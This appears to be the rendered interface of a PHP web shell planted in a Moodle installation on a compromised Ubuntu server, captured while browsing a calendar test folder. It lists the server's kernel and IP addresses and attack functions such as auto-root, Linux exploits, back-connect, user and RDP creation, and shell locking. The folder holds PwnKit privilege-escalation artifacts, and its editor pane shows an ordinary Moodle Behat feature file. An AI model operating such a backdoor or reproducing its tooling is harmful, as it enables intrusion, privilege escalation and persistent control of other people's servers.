Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
calendar /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_calendar.php
4.86
KB
-rwxrwxrwx
calendar.feature
9.38
KB
-rwxrwxrwx
calendar_import.feature
3.08
KB
-rwxrwxrwx
calendar_lookahead.feature
1.69
KB
-rwxrwxrwx
category_events.feature
5.55
KB
-rwxrwxrwx
export.feature
2.55
KB
-rwxrwxrwx
minicalendar.feature
1.61
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : export.feature
@core @core_calendar @core_calendar_export Feature: Export calendar events In order to be able to use my calendar events outside of Moodle As a user I need to export calendar events in iCalendar format Background: Given the following "users" exist: | username | firstname | lastname | email | | student1 | Student | 1 | student1@example.com | And the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "course enrolments" exist: | user | course | role | | student1 | C1 | student | And I log in as "student1" Scenario: Viewing calendar export options Given I follow "This month" When I click on "Export calendar" "button" Then I should see "All events" And I should see "Events related to courses" And I should see "Events related to groups" And I should see "My personal events" Scenario: Generating calendar URL for all events Given I follow "This month" And I click on "Export calendar" "button" And I set the field "All events" to "1" And I set the field "Recent and next 60 days" to "1" When I click on "Get calendar URL" "button" Then I should see "&preset_what=all&" Scenario: Generating calendar URL for course events Given I follow "This month" And I click on "Export calendar" "button" And I set the field "Events related to courses" to "1" And I set the field "Recent and next 60 days" to "1" When I click on "Get calendar URL" "button" Then I should see "&preset_what=courses&" Scenario: Generating calendar URL for group events Given I follow "This month" And I click on "Export calendar" "button" And I set the field "Events related to groups" to "1" And I set the field "Recent and next 60 days" to "1" When I click on "Get calendar URL" "button" Then I should see "&preset_what=groups&" Scenario: Generating calendar URL for category events Given I follow "This month" And I click on "Export calendar" "button" And I set the field "Events related to categories" to "1" And I set the field "Recent and next 60 days" to "1" When I click on "Get calendar URL" "button" Then I should see "&preset_what=categories&" Scenario: Generating calendar URL for user events Given I follow "This month" And I click on "Export calendar" "button" And I set the field "My personal events" to "1" And I set the field "Recent and next 60 days" to "1" When I click on "Get calendar URL" "button" Then I should see "&preset_what=user&"
Close